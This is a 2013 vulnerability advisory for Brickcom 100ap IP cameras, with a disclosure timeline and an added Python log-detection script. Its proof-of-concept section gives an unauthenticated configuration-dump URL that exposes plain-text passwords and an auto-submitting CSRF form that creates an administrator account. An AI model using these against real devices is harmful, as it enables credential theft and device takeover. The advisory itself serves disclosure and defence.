
Brickcom 100ap Series Authentication Bypass / CSRF

Published: 13 Jun 2013 00:00:00 | Reported by: Javier Repiso Sanchez | Type: packetstorm | Source: packetstormsecurity.com

Brickcom 100ap Series Vulnerabilities including Authentication Bypass, Clear Text Storage, CSRF, and Privilege Escalation

`============================================================================  
BRICKCOM  
====================================================================  
============================================================================  
  
1.Advisory Information  
Title: Brickcom 100ap Series Vulnerabilities  
Date Published: 12/06/2013  
Date of last updated: 12/06/2013  
  
2.Vulnerability Description  
Multiple vulnerabilities have been found in this device.  
-CVE-2013-3689. Authentication Bypass Issues (CWE-592) and Clear Text Storage of Sensitive Information (CWE-312)  
-CVE-2013-3690. Cross Site Request Forgery (CWE-352), Permissions, Privileges, and Access Control (CWE-264) and Execution with Unnecessary Privileges (CWE-250)  
  
3.Affected Products  
The following products are affected by these vulnerabilities:  
FB-100Ap, WCB-100Ap, MD-100Ap, WFB-100Ap, OB-100Ae, OSD-040E  
Other models may be affected, but they were not checked.  
-CVE-2013-3689.  
We have detected the following vulnerable firmware versions: firmwareVersion=v3.0.6.7, v3.0.6.12, v3.0.6.16C1  
In the following firmware versions you need to be logged in as administrator to download this file, but the information is still in plain text: firmwareVersion=v3.1.0.8, v3.1.0.4  
-CVE-2013-3690.  
All firmware checked.  
  
4.PoC  
4.1.Authentication Bypass & Clear Text Storage of Sensitive Information  
CVE-2013-3689: The device's entire configuration file can be downloaded by requesting the following URL (all data shown will be in plain text). No authentication is necessary.  
_____________________________________________________________________________  
http://xx.xx.xx.xx/configfile.dump?action=get  
_____________________________________________________________________________  
  
The most interesting parameters could be:  
UserSetSetting.userList.users[nº].password= ***  
UserSetSetting.userList.users[nº].name= ***  
  
4.2.Cross Site Request Forgery (CSRF) + Privilege Escalation  
CVE-2013-3690: CSRF is possible via the POST method.   
Privilege escalation from a viewer user to an administrator user is also possible.  
These cameras use a web interface which is prone to CSRF vulnerabilities.   
A malicious user can attempt targeted attacks by sending a special CSRF vector, which allows web interface parameters to be manipulated.  
The following request can exploit this vulnerability:  
_____________________________________________________________________________  
<html>  
<body>  
<form name="gobap" action="http://xx.xx.xx.xx/cgi-bin/users.cgi" method="POST">  
<input type="hidden" name="action" value="add">  
<input type="hidden" name="index" value="0">  
<input type="hidden" name="username" value="test2">  
<input type="hidden" name="password" value="test2">  
<input type="hidden" name="privilege" value="1">  
<script>document.gobap.submit();</script>  
</form>  
</body>  
</html>  
_____________________________________________________________________________  
  
5.Credits  
-CVE-2013-3689 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.   
-CVE-2013-3690 was discovered by Jonás Ropero Castillo.   
  
6.Report Timeline  
-2013-05-31: The student team notifies Brickcom Customer Support of the vulnerabilities.   
-2013-05-31: Brickcom answers that it agrees with some of the vulnerabilities, but thinks some others are not correct.  
(CVE-2013-3689, Authentication bypass and plain text information: After talking with the vendor, it looks like this bug is fixed after firmware 3.1.x.x, but the information is still shown in plain text, so they should fix this second one)  
-2013-06-03: The students check and communicate to Brickcom the detailed products and firmware versions affected by the vulnerabilities.  
-2013-06-04: The vendor agrees with everything stated and reports that it will fix it as soon as possible.  
`
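
Added example (not part of the original advisory and not vendor code): a log check for the two request patterns in section 4, the configuration dump URL and a POST to users.cgi arriving from a page that is not the camera's own. It assumes a reverse proxy in front of the camera writing Combined Log Format with the authenticated user in the third field; the camera address 192.0.2.50 and all sample lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Combined Log Format, as written by a reverse proxy in front of the camera (assumption).
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "[^"]*"')

def classify(line, camera_host):
    """Return a finding label for one access-log line, or None if it is unremarkable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["target"])
    path = url.path.lower()
    # CVE-2013-3689: the configuration dump holds user names and passwords in plain text.
    if path == "/configfile.dump" and parse_qs(url.query).get("action") == ["get"]:
        if m["status"] == "200" and m["user"] == "-":
            return "config-dump-unauthenticated"  # served without a login
        return "config-dump-access"               # logged-in download, still worth auditing
    # CVE-2013-3690: POST to users.cgi whose Referer is missing or is not the camera itself.
    if m["method"] == "POST" and path == "/cgi-bin/users.cgi":
        if urlsplit(m["referer"]).hostname != camera_host:
            return "users-cgi-foreign-referer"
    return None

def scan(lines, camera_host):
    """Return (line_number, label) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        label = classify(line, camera_host)
        if label:
            hits.append((n, label))
    return hits

# Constructed sample log lines (documentation address ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [12/Jun/2013:10:00:01 +0000] "GET /configfile.dump?action=get HTTP/1.1" 200 18230 "-" "curl/7.30"',
    '192.0.2.10 - admin [12/Jun/2013:10:05:00 +0000] "GET /configfile.dump?action=get HTTP/1.1" 200 18230 "http://192.0.2.50/" "Mozilla/5.0"',
    '192.0.2.10 - viewer [12/Jun/2013:10:06:00 +0000] "POST /cgi-bin/users.cgi HTTP/1.1" 200 112 "http://example.test/page.html" "Mozilla/5.0"',
    '192.0.2.10 - admin [12/Jun/2013:10:07:00 +0000] "POST /cgi-bin/users.cgi HTTP/1.1" 200 112 "http://192.0.2.50/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for n, label in scan(SAMPLE, "192.0.2.50"):
        print(n, label)
```

A Referer check only surfaces candidates for review: some browsers and privacy tools omit the header, so a flagged users.cgi line should be compared against the user list in the device configuration.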
